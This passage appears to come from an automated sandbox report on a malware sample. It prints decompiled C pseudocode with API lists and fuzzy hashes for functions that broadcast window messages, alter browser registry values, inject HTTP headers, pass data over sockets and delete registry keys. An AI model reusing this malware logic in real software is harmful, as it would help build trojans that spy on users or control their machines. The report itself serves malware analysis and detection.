							return E0040F053(_t42 * 0x30, 0x417024);
						}
						_t45 = E0040F0C0(_t65);
						 *0x417024 =  *0x417024 & 0x00000000;
						 *0x417020 =  *0x417020 & 0x00000000;
						return _t45;
					}
				}
			}













    0x0040ccaf
    0x0040ccaf
    0x0040ccb5
    0x0040ccbe
    0x0040ccc5
    0x0040ccce
    0x0040ccce
    0x0040ccd4
    0x0040ccd5
    0x0040ccda
    0x0040ccdc
    0x0040ccdd
    0x0040ccdf
    0x0040cce6
    0x0040ccf2
    0x0040ccfe
    0x0040cd0a
    0x0040cd0f
    0x0040cd10
    0x0040cd13
    0x0040cd18
    0x0040cd1c
    0x0040cd24
    0x0040cd2d
    0x0040cd32
    0x0040cd3b
    0x0040cd44
    0x0040cd44
    0x0040cd4a
    0x0040cd4e
    0x0040cd52
    0x0040cd54
    0x0040cd59
    0x0040cd5e
    0x0040cd5e
    0x0040cd59
    0x0040cd66
    0x0040cd66
    0x0040cd6b
    0x0040cd70
    0x0040cd76
    0x0040cdba
    0x0040cdba
    0x0040cd78
    0x0040cd78
    0x0040cd89
    0x00000000
    0x0040cd8b
    0x0040cd8e
    0x0040cda6
    0x0040cda7
    0x00000000
    0x0040cdb4
    0x0040cd91
    0x0040cd96
    0x0040cd9d
    0x0040cda5
    0x0040cda5
    0x0040cd89

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E5F5), ref: 0040CCC5
    • CloseHandle.KERNEL32(?), ref: 0040CCCE
    • InternetCloseHandle.WININET(?), ref: 0040CD32
    • InternetCloseHandle.WININET(?), ref: 0040CD3B
    • InternetCloseHandle.WININET(?), ref: 0040CD44
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$ObjectSingleWait
    • String ID:
    • API String ID: 2916869018-0
    • Opcode ID: a2848622eef05c504f108aa018359c93a96dffbb54e4c99702863a87d9d8b5df
    • Instruction ID: 77f27aa971988fef1b3aaac74bb1410e51ad1408d72d29d96a45137fea876343
    • Opcode Fuzzy Hash: a2848622eef05c504f108aa018359c93a96dffbb54e4c99702863a87d9d8b5df
    • Instruction Fuzzy Hash: 71316D32514701DFC730AF25ED85A46BBF2AF08714B018A3FE556A6AF2D735E844CB88
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004088AE, Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004088AE() {
				long _v4;
				struct HWND__* _t2;
				struct HWND__* _t3;
				struct HWND__* _t8;
				struct HWND__* _t10;

				_t2 = GetTopWindow(_t8);
				_t10 = _t2;
				if(_t10 == 0) {
					L6:
					return _t2;
				}
				_t3 = GetWindow(_t10, 1);
				if(_t3 != 0) {
					_t10 = _t3;
				}
				do {
					if(IsWindowVisible(_t10) != 0) {
						SendMessageTimeoutW(_t10,  *0x416a10, 0, 0, 3, 0x12c,  &_v4);
					}
					E004088AE();
					_t2 = GetWindow(_t10, 3);
					_t10 = _t2;
				} while (_t10 != 0);
				goto L6;
			}








    0x004088b1
    0x004088b7
    0x004088bb
    0x0040890c
    0x0040890c
    0x0040890c
    0x004088c0
    0x004088c8
    0x004088ca
    0x004088ca
    0x004088cc
    0x004088d5
    0x004088ee
    0x004088ee
    0x004088f6
    0x004088fe
    0x00408904
    0x00408906
    0x00000000

    APIs
    • GetTopWindow.USER32 ref: 004088B1
    • GetWindow.USER32(00000000,00000001), ref: 004088C0
    • IsWindowVisible.USER32(00000000), ref: 004088CD
    • SendMessageTimeoutW.USER32(00000000,00000000,00000000,00000003,0000012C,?), ref: 004088EE
    • GetWindow.USER32(00000000,00000003), ref: 004088FE
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$MessageSendTimeoutVisible
    • String ID:
    • API String ID: 3425020583-0
    • Opcode ID: 4d5fa724254a0be4908873dd8804c3516ccf0e29da3a39c77e9a22441ec3923b
    • Instruction ID: fbe8ab7ee87c69692b9a327b7dcaaafe8f934ea7b5899c9ba5bf8c9eaac708e1
    • Opcode Fuzzy Hash: 4d5fa724254a0be4908873dd8804c3516ccf0e29da3a39c77e9a22441ec3923b
    • Instruction Fuzzy Hash: 3FF05E727416317BE6322720AD09FAB2A99AF05B51F068139F941F52D4DF78ED008AED
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B300, Relevance: 7.5, APIs: 5, Instructions: 28synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040B300(void** __esi, intOrPtr _a4) {
				void* _t7;

				_t18 = __esi;
				if(__esi != 0) {
					SetEvent(__esi[1]);
					E0040B37A(_t18, _a4, 0, 0, 0, 0, 0);
					WaitForSingleObject(__esi[2], 0xffffffff);
					CloseHandle( *__esi);
					CloseHandle(__esi[1]);
					CloseHandle(__esi[2]);
					E0040F0C0(__esi[4]);
					return E0040F0C0(__esi);
				}
				return _t7;
			}




    0x0040b303
    0x0040b305
    0x0040b30a
    0x0040b319
    0x0040b323
    0x0040b32b
    0x0040b334
    0x0040b33d
    0x0040b346
    0x00000000
    0x0040b34c
    0x0040b352

    APIs
    • SetEvent.KERNEL32(?,00000000,0040AA84,025DF8E0), ref: 0040B30A
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040B323
    • CloseHandle.KERNEL32(00000000), ref: 0040B32B
    • CloseHandle.KERNEL32(?), ref: 0040B334
    • CloseHandle.KERNEL32(?), ref: 0040B33D
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
    • String ID:
    • API String ID: 998100866-0
    • Opcode ID: a2778cabd55aa83e5535e8b720a9038d03f3f1182c2b2600243a22a11380d0dc
    • Instruction ID: 0a37717a109ce5986a01dab689cfbcfa5780f6383f880f5966c77ab8c2a5044a
    • Opcode Fuzzy Hash: a2778cabd55aa83e5535e8b720a9038d03f3f1182c2b2600243a22a11380d0dc
    • Instruction Fuzzy Hash: 67E0C036000611EBCB322F65EC0998BBA72FF44711316863DF576608B5CB359451DB4C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040D6EA, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179timenetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040D6EA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				struct _SYSTEMTIME _v32;
				char _v48;
				void* __ebx;
				void* __esi;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed short _t89;
				signed int _t90;
				intOrPtr _t93;
				void* _t108;
				signed int* _t123;
				void* _t129;
				void* _t131;
				intOrPtr* _t135;
				intOrPtr _t136;
				signed int _t137;

				_t129 = __edx;
				_t126 = __ecx;
				_t119 = L"Enabled";
				if(E004121F9(__ecx, 0x80000001, L"Enabled") != 0) {
					E0041223B(__ecx, 0x80000001, L"Enabled");
				}
				_t130 = L"EnabledV8";
				if(E004121F9(_t126, 0x80000001, L"EnabledV8") != 0) {
					E0041223B(_t126, 0x80000001, L"EnabledV8");
				}
				if(E004121F9(_t126, 0x80000002, _t119) != 0) {
					E0041223B(_t126, 0x80000002, _t119);
				}
				if(E004121F9(_t126, 0x80000002, _t130) != 0) {
					E0041223B(_t126, 0x80000002, _t130);
				}
				_t71 = _a20;
				_t128 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
				_v16 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
				if(( *(_t71 + 2) & 0x00000080) == 0) {
					L14:
					_v8 = _v8 & 0x00000000;
					_v12 = _v12 | 0xffffffff;
					_t74 = E00414398( &_v8, _t129, __eflags, _a4, _a8 + 1, 0x80000000);
					_a8 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L35:
						E0040F0C0(_a8);
						L36:
						return _v12;
					}
					__eflags = _v8 - 0x12;
					if(_v8 < 0x12) {
						goto L35;
					}
					_t134 =  *(_a16 + 0x430);
					_t78 = E0040CBFA( *(_a16 + 0x430));
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						L18:
						_t131 = _t78 * 0x30 +  *0x417024;
						_t30 = _t131 + 0x24; // -4288512
						_t135 = _t30;
						_t84 = E0040F053(( *(_t131 + 0x28) + 1) * 0x18, _t135);
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						_t85 =  *(_t131 + 0x28);
						_t123 = _t85 * 0x18 +  *_t135;
						_t136 = _a20;
						 *(_t131 + 0x28) = _t85 + 1;
						_t123[1] = _a8;
						_t123[2] = _v8;
						_t89 =  *(_t136 + 0xc) & 0x0000ffff;
						__eflags = _t89;
						if(_t89 != 0) {
							_t100 = (_t89 & 0x0000ffff) + _t136;
							__eflags = (_t89 & 0x0000ffff) + _t136 | 0xffffffff;
							_t123[5] = E0040F244((_t89 & 0x0000ffff) + _t136 | 0xffffffff, _t100);
						}
						_t90 =  *(_t136 + 0xa) & 0x0000ffff;
						__eflags = _t90;
						if(_t90 != 0) {
							_t97 = (_t90 & 0x0000ffff) + _t136;
							__eflags = (_t90 & 0x0000ffff) + _t136 | 0xffffffff;
							_t90 = E0040F244((_t90 & 0x0000ffff) + _t136 | 0xffffffff, _t97);
							_t123[3] = _t90;
						}
						__eflags = _t123[3];
						if(_t123[3] != 0) {
							L25:
							__eflags = _t90 | 0xffffffff;
							_t123[4] = E0040F244(_t90 | 0xffffffff, _v16);
							goto L26;
						} else {
							__eflags =  *(_t136 + 2) & 0x00000080;
							if(( *(_t136 + 2) & 0x00000080) == 0) {
								L26:
								__eflags =  *(_t136 + 2) & 0x00000010;
								if(( *(_t136 + 2) & 0x00000010) != 0) {
									 *_t123 =  *_t123 | 0x00000001;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000020;
								if(( *(_t136 + 2) & 0x00000020) != 0) {
									 *_t123 =  *_t123 | 0x00000002;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000040;
								if(( *(_t136 + 2) & 0x00000040) != 0) {
									 *_t123 =  *_t123 | 0x00000004;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000080;
								if(( *(_t136 + 2) & 0x00000080) != 0) {
									 *_t123 =  *_t123 | 0x00000008;
									__eflags =  *_t123;
								}
								_t93 =  *0x416c34; // 0x25df5a8
								_t60 = _t93 + 0x154; // 0x2563579
								HttpAddRequestHeadersA( *(_a16 + 0x430),  *_t60, 0xffffffff, 0x80000000);
								_v12 = _v12 & 0x00000000;
								goto L36;
							}
							goto L25;
						}
					}
					_t78 = E0040CC23(1, _t134);
					__eflags = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						goto L35;
					}
					goto L18;
				} else {
					E004100F6( &_v48, _t128, E0040F521(_t128));
					_v8 = _v8 & 0x00000000;
					_t108 = E00408471( &_v8, _t128, 0,  &_v48);
					_t137 = _v8;
					if(_t108 != 0x10) {
						L13:
						E0040F0C0(_t137);
						goto L14;
					}
					GetSystemTime( &_v32);
					if( *((intOrPtr*)(_t137 + 6)) != _v32.wDay ||  *((intOrPtr*)(_t137 + 2)) != _v32.wMonth) {
						goto L13;
					} else {
						return E0040F0C0(_t137) | 0xffffffff;
					}
				}
			}

























    0x0040d6ea
    0x0040d6ea
    0x0040d6f3
    0x0040d706
    0x0040d70a
    0x0040d70a
    0x0040d70f
    0x0040d71d
    0x0040d721
    0x0040d721
    0x0040d734
    0x0040d738
    0x0040d738
    0x0040d746
    0x0040d74a
    0x0040d74a
    0x0040d74f
    0x0040d756
    0x0040d75c
    0x0040d75f
    0x0040d7bd
    0x0040d7bd
    0x0040d7c4
    0x0040d7d5
    0x0040d7da
    0x0040d7dd
    0x0040d7df
    0x0040d8ec
    0x0040d8ef
    0x0040d8f4
    0x00000000
    0x0040d8f4
    0x0040d7e5
    0x0040d7e9
    0x00000000
    0x00000000
    0x0040d7f2
    0x0040d7f8
    0x0040d7fd
    0x0040d800
    0x0040d814
    0x0040d81d
    0x0040d826
    0x0040d826
    0x0040d829
    0x0040d82e
    0x0040d830
    0x00000000
    0x00000000
    0x0040d836
    0x0040d83e
    0x0040d840
    0x0040d844
    0x0040d84a
    0x0040d850
    0x0040d853
    0x0040d857
    0x0040d85a
    0x0040d85f
    0x0040d862
    0x0040d86a
    0x0040d86a
    0x0040d86d
    0x0040d871
    0x0040d874
    0x0040d879
    0x0040d87c
    0x0040d87f
    0x0040d884
    0x0040d884
    0x0040d887
    0x0040d88b
    0x0040d893
    0x0040d896
    0x0040d89e
    0x00000000
    0x0040d88d
    0x0040d88d
    0x0040d891
    0x0040d8a1
    0x0040d8a1
    0x0040d8a5
    0x0040d8a7
    0x0040d8a7
    0x0040d8a7
    0x0040d8aa
    0x0040d8ae
    0x0040d8b0
    0x0040d8b0
    0x0040d8b0
    0x0040d8b3
    0x0040d8b7
    0x0040d8b9
    0x0040d8b9
    0x0040d8b9
    0x0040d8bc
    0x0040d8c0
    0x0040d8c2
    0x0040d8c2
    0x0040d8c2
    0x0040d8c5
    0x0040d8d1
    0x0040d8e0
    0x0040d8e6
    0x00000000
    0x0040d8e6
    0x00000000
    0x0040d891
    0x0040d88b
    0x0040d806
    0x0040d80b
    0x0040d80e
    0x00000000
    0x00000000
    0x00000000
    0x0040d761
    0x0040d76c
    0x0040d771
    0x0040d77e
    0x0040d783
    0x0040d789
    0x0040d7b7
    0x0040d7b8
    0x00000000
    0x0040d7b8
    0x0040d78f
    0x0040d79d
    0x00000000
    0x0040d7a9
    0x00000000
    0x0040d7af
    0x0040d79d

    APIs
    • HttpAddRequestHeadersA.WININET(?,02563579,000000FF,80000000), ref: 0040D8E0
    • GetSystemTime.KERNEL32(?,00000000,?,?,?,00000000,80000002,EnabledV8,80000002,Enabled,80000001,EnabledV8,80000001,Enabled), ref: 0040D78F
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FreeHeadersHeapHttpRequestSystemTime
    • String ID: Enabled$EnabledV8
    • API String ID: 2915018814-2402240967
    • Opcode ID: c67b571225c63d4fea0539e2653570520cf32579c1d6bae6ba6b9fed7d931862
    • Instruction ID: 179babfc5476f36df04242e9d0cf11d5560011b83c23579df7fb9967512e48f3
    • Opcode Fuzzy Hash: c67b571225c63d4fea0539e2653570520cf32579c1d6bae6ba6b9fed7d931862
    • Instruction Fuzzy Hash: 8B51C571800205AADB24EFA5CD85BAB7BF8AF05324F04817AF860F72D1D738D949C768
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409BD7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153networkCOMMON
    Download Yara Rule
    C-Code - Quality: 46%
    			E00409BD7(intOrPtr _a4) {
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				void* _v92;
				char _v96;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v124;
				intOrPtr _v140;
				void* __edi;
				void* __esi;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t68;
				void* _t81;
				intOrPtr* _t84;
				intOrPtr _t90;
				intOrPtr* _t93;

				_t90 = _a4;
				_push(0x2710);
				_t81 = 4;
				_push(_t81);
				_push( &_v84);
				if(E004104CA(_t90) != _t81 || E004104CA(_t90,  &_v96, _t81, 0x2710) != _t81) {
					L29:
					return E004108F5(_a4);
				} else {
					_t51 = _v96;
					if(_v96 > 0xffff) {
						goto L29;
					}
					_t52 = E0040F0A8(_t51);
					_v88 = _t52;
					if(_t52 == 0) {
						goto L29;
					}
					if(E004104CA(_t90, _t52, _v96, 0x2710) != _v108) {
						L28:
						E0040F0C0(_v88);
						goto L29;
					}
					if(_v84 == 0xa) {
						_t55 =  *0x416c34; // 0x25df5a8
						_t14 = _t55 + 0x70; // 0x25dfc30
						_v80 = 0x32;
						_v92 = E0040F21C( *_t14);
						if(_v96 >= _t81) {
							_t87 = _v88;
							E0040F0FC( &_v80, _v88, _t81);
							_t75 = _v108;
							if(_v108 > _t81) {
								_v96 = E0040F4DC(_t75 + 0xfffffffc, _t87 + 4);
							}
						}
						if(_v92 == 0) {
							goto L28;
						} else {
							_t93 = E0040970D(_v92, _v80, 0);
							_v92 = _t93;
							if(_t93 == 0) {
								L27:
								E0040F0C0(_v92);
								goto L28;
							}
							_push(1);
							_push( &_v76);
							_push(_t93);
							if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
								L26:
								 *((intOrPtr*)( *_t93 + 8))(_t93);
								goto L27;
							}
							_v76 = 0x1000;
							 *0x416d8c(_a4,  &_v80, 8, 0);
							_t84 = E0040F0A8(_v92);
							if(_t84 == 0) {
								goto L26;
							}
							while(1) {
								_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
								if(_t68 != 0 || _v140 == _t68) {
									break;
								}
								_push(_t68);
								_push(_v140);
								_push(_t84);
								_push(_a4);
								if( *0x416d8c() == 0xffffffff) {
									break;
								}
								if(E004104CA(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
									_t93 = _v140;
									break;
								} else {
									_t93 = _v140;
									continue;
								}
							}
							E0040F0C0(_t84);
							goto L26;
						}
					}
					if(_v84 == 0x14 && _v96 >= _t81) {
						_push(0);
						_push(_v96);
						_push(_v88);
						_push(_t90);
						if( *0x416d8c() == _v112) {
							E0040C046();
						}
					}
					goto L28;
				}
			}






















    0x00409be3
    0x00409beb
    0x00409bee
    0x00409bef
    0x00409bf4
    0x00409bfc
    0x00409da3
    0x00409db1
    0x00409c16
    0x00409c16
    0x00409c1f
    0x00000000
    0x00000000
    0x00409c25
    0x00409c2a
    0x00409c30
    0x00000000
    0x00000000
    0x00409c45
    0x00409d9a
    0x00409d9e
    0x00000000
    0x00409d9e
    0x00409c50
    0x00409c8c
    0x00409c91
    0x00409c94
    0x00409ca1
    0x00409ca9
    0x00409cab
    0x00409cb6
    0x00409cbb
    0x00409cc1
    0x00409ccf
    0x00409ccf
    0x00409cc1
    0x00409cd9
    0x00000000
    0x00409cdf
    0x00409ced
    0x00409cef
    0x00409cf5
    0x00409d91
    0x00409d95
    0x00000000
    0x00409d95
    0x00409cfd
    0x00409d03
    0x00409d04
    0x00409d0a
    0x00409d8b
    0x00409d8e
    0x00000000
    0x00409d8e
    0x00409d17
    0x00409d1f
    0x00409d2e
    0x00409d32
    0x00000000
    0x00000000
    0x00409d3a
    0x00409d47
    0x00409d4c
    0x00000000
    0x00000000
    0x00409d54
    0x00409d55
    0x00409d59
    0x00409d5a
    0x00409d66
    0x00000000
    0x00000000
    0x00409d77
    0x00409d81
    0x00000000
    0x00409d36
    0x00409d36
    0x00000000
    0x00409d36
    0x00409d77
    0x00409d86
    0x00000000
    0x00409d86
    0x00409cd9
    0x00409c57
    0x00409c67
    0x00409c69
    0x00409c6d
    0x00409c71
    0x00409c7c
    0x00409c82
    0x00409c82
    0x00409c7c
    0x00000000
    0x00409c57

    APIs
      • Part of subcall function 004104CA: select.WS2_32(00000000,?,00000000,00000000,0000000C), ref: 0041051A
      • Part of subcall function 004104CA: recv.WS2_32(0000000C,00000000,?,00000000), ref: 00410532
    • send.WS2_32(?,00002710,00002710,00000000), ref: 00409C72
      • Part of subcall function 0040C046: GetCurrentThread.KERNEL32 ref: 0040C049
      • Part of subcall function 0040C046: SetThreadPriority.KERNEL32(00000000,?,00408052), ref: 0040C050
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000001,025DF739,?,00408052), ref: 0040C063
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000002,025DF739,?,00408052), ref: 0040C077
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000002,025DF979,?,00408052), ref: 0040C086
      • Part of subcall function 0040C046: Sleep.KERNEL32(000003E8,?,00408052), ref: 0040C091
    • send.WS2_32 ref: 00409D1F
    • send.WS2_32(?,00000000,00002710,00000000), ref: 00409D5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Deletesend$Thread$CurrentPrioritySleeprecvselect
    • String ID: 2
    • API String ID: 850893207-450215437
    • Opcode ID: 46fe44349554b123d1742cfd3457736fce94dc09eca5e6b2f2c4ccb72573c980
    • Instruction ID: 34227afae8e1390ff33c29a62b652d35070be1b20eb703bc4365b587749610a1
    • Opcode Fuzzy Hash: 46fe44349554b123d1742cfd3457736fce94dc09eca5e6b2f2c4ccb72573c980
    • Instruction Fuzzy Hash: 3D519C72148301AFD710EF61C88496FB7E8AF84314F14893FF554A2292D779DD49CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A4AE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E0040A4AE(intOrPtr __ecx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				intOrPtr _t29;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t47;
				char _t50;
				char* _t55;
				intOrPtr _t57;
				char* _t59;
				signed char _t61;
				char* _t62;
				signed char _t63;
				intOrPtr* _t66;
				intOrPtr _t71;
				void* _t72;

				_t58 = __ecx;
				 *0x416a68 =  *0x416a68 & 0x00000000;
				 *0x416a14 =  *0x416a14 & 0x00000000;
				 *0x416fe4(0x416a6c);
				if(WaitForSingleObject( *0x416a8c, 0xea60) == 0x102) {
					do {
						_t29 = E00408471( &_v16, _t58, 0, "!213KJhndkmnihjd");
						_t62 = _v16;
						if(_t62 != 0 && _t29 > 5) {
							_t58 = _t29;
							_t32 = E0040F732(_t62, _t29);
							_t78 = _t32;
							if(_t32 != 0) {
								_v8 = _t62;
								do {
									_t55 = _v8;
									__eflags =  *_t55;
									_t59 = _t55;
									if( *_t55 != 0) {
										while(1) {
											_t50 =  *_t59;
											_t59 = _t59 + 1;
											__eflags = _t50 - 0x7c;
											if(_t50 == 0x7c) {
												goto L10;
											}
											__eflags =  *_t59;
											if( *_t59 != 0) {
												continue;
											}
											goto L10;
										}
									}
									L10:
									__eflags =  *_t59;
									if( *_t59 != 0) {
										_v20 = E004101FE(_t59, E0040F521(_t59));
										_t36 = E0040A07D(_t35);
										__eflags = _t36;
										if(_t36 == 0) {
											_t37 = 0x10;
											_t66 = E0040F0A8(_t37);
											__eflags = _t66;
											if(_t66 != 0) {
												_v12 = E0040F521(_t55);
												_t71 = E0040F244(_t39, _t55);
												_t61 = 0;
												__eflags = _t71;
												if(_t71 == 0) {
													L24:
													E0040F0C0(_t66);
												} else {
													_t63 = 0;
													__eflags = _v12;
													if(_v12 <= 0) {
														L23:
														E0040F0C0(_t71);
														goto L24;
													} else {
														do {
															__eflags =  *((char*)(_t61 + _t71)) - 0x7c;
															if( *((char*)(_t61 + _t71)) != 0x7c) {
																goto L18;
															} else {
																_t10 = _t71 + 1; // 0x1
																_t43 = _t61 + _t10;
																 *((char*)(_t61 + _t71)) = 0;
																 *((intOrPtr*)(_t72 + (_t63 & 0x000000ff) * 4 - 0x18)) = _t43;
																__eflags = _t43;
																if(_t43 == 0) {
																	break;
																} else {
																	_t63 = _t63 + 1;
																	__eflags = _t63 - 2;
																	if(_t63 == 2) {
																		L20:
																		_t57 = _v20;
																		_t44 = E0040A0BD(_t57);
																		__eflags = _t44;
																		if(_t44 == 0) {
																			goto L23;
																		} else {
																			 *((intOrPtr*)(_t66 + 4)) = _v28;
																			 *_t66 = _t71;
																			 *((intOrPtr*)(_t66 + 8)) = _v24;
																			 *((intOrPtr*)(_t66 + 0xc)) = _t57;
																			 *0x416a88 =  *0x416a88 + 1;
																			_t47 = E0040C14A(_t61, E0040A47B, _t66);
																			__eflags = _t47;
																			if(_t47 <= 0) {
																				 *0x416a88 =  *0x416a88 - 1;
																				__eflags =  *0x416a88;
																				E0040A15B(_t57);
																				goto L23;
																			}
																		}
																	} else {
																		goto L18;
																	}
																}
															}
															goto L25;
															L18:
															_t61 = _t61 + 1;
															__eflags = _t61 - _v12;
														} while (_t61 < _v12);
														__eflags = _t63 - 2;
														if(_t63 != 2) {
															goto L23;
														} else {
															goto L20;
														}
													}
												}
											}
										}
									}
									L25:
									_t58 = _v8;
									_t33 = E0040F750(_v8, 1);
									_v8 = _t33;
									__eflags = _t33;
								} while (_t33 != 0);
							} else {
								E00408558(_t78, 0, "!213KJhndkmnihjd");
							}
							E0040F0C0(_v16);
						}
					} while (WaitForSingleObject( *0x416a8c, 0xea60) == 0x102);
				}
				 *0x416a88 =  *0x416a88 - 1;
				return 0;
			}





























    0x0040a4ae
    0x0040a4b1
    0x0040a4b8
    0x0040a4c7
    0x0040a4e3
    0x0040a4ec
    0x0040a4f7
    0x0040a4fc
    0x0040a501
    0x0040a510
    0x0040a514
    0x0040a519
    0x0040a51b
    0x0040a52a
    0x0040a52d
    0x0040a52d
    0x0040a530
    0x0040a533
    0x0040a535
    0x0040a537
    0x0040a537
    0x0040a539
    0x0040a53a
    0x0040a53c
    0x00000000
    0x00000000
    0x0040a53e
    0x0040a541
    0x00000000
    0x00000000
    0x00000000
    0x0040a541
    0x0040a537
    0x0040a543
    0x0040a543
    0x0040a546
    0x0040a55a
    0x0040a55d
    0x0040a562
    0x0040a564
    0x0040a56c
    0x0040a572
    0x0040a574
    0x0040a576
    0x0040a584
    0x0040a58c
    0x0040a58e
    0x0040a590
    0x0040a592
    0x0040a60b
    0x0040a60c
    0x0040a594
    0x0040a594
    0x0040a596
    0x0040a599
    0x0040a605
    0x0040a606
    0x00000000
    0x0040a59b
    0x0040a59b
    0x0040a59b
    0x0040a59f
    0x00000000
    0x0040a5a1
    0x0040a5a1
    0x0040a5a1
    0x0040a5a8
    0x0040a5ac
    0x0040a5b0
    0x0040a5b2
    0x00000000
    0x0040a5b4
    0x0040a5b4
    0x0040a5b6
    0x0040a5b9
    0x0040a5c6
    0x0040a5c6
    0x0040a5c9
    0x0040a5ce
    0x0040a5d0
    0x00000000
    0x0040a5d2
    0x0040a5d5
    0x0040a5dc
    0x0040a5de
    0x0040a5e1
    0x0040a5e4
    0x0040a5ef
    0x0040a5f4
    0x0040a5f6
    0x0040a5f8
    0x0040a5f8
    0x0040a600
    0x00000000
    0x0040a600
    0x0040a5f6
    0x00000000
    0x00000000
    0x00000000
    0x0040a5b9
    0x0040a5b2
    0x00000000
    0x0040a5bb
    0x0040a5bb
    0x0040a5bc
    0x0040a5bc
    0x0040a5c1
    0x0040a5c4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040a5c4
    0x0040a599
    0x0040a592
    0x0040a576
    0x0040a564
    0x0040a611
    0x0040a611
    0x0040a616
    0x0040a61b
    0x0040a61e
    0x0040a61e
    0x0040a51d
    0x0040a520
    0x0040a520
    0x0040a629
    0x0040a629
    0x0040a63f
    0x0040a64c
    0x0040a64d
    0x0040a656

    APIs
    • RtlInitializeCriticalSection.NTDLL(00416A6C), ref: 0040A4C7
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 0040A4D8
    • WaitForSingleObject.KERNEL32(0000EA60,00000000,!213KJhndkmnihjd), ref: 0040A639
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSingleWait$CriticalInitializeSection
    • String ID: !213KJhndkmnihjd
    • API String ID: 3229800866-75480694
    • Opcode ID: 8674efd75facac57a70c1ad001bf632fd2bbcc6a6e5092067f9e9e204be7a637
    • Instruction ID: af143862fd356ee8df9386d8ba87e7e0d9ce9b4cde6799e4e5da0b45702a10ee
    • Opcode Fuzzy Hash: 8674efd75facac57a70c1ad001bf632fd2bbcc6a6e5092067f9e9e204be7a637
    • Instruction Fuzzy Hash: BB411530900300AADB20AF65DC857AE7BB5AF46308F15843FE441B72D2D77E8995875A
    Uniqueness

    Uniqueness Score: -1.00%

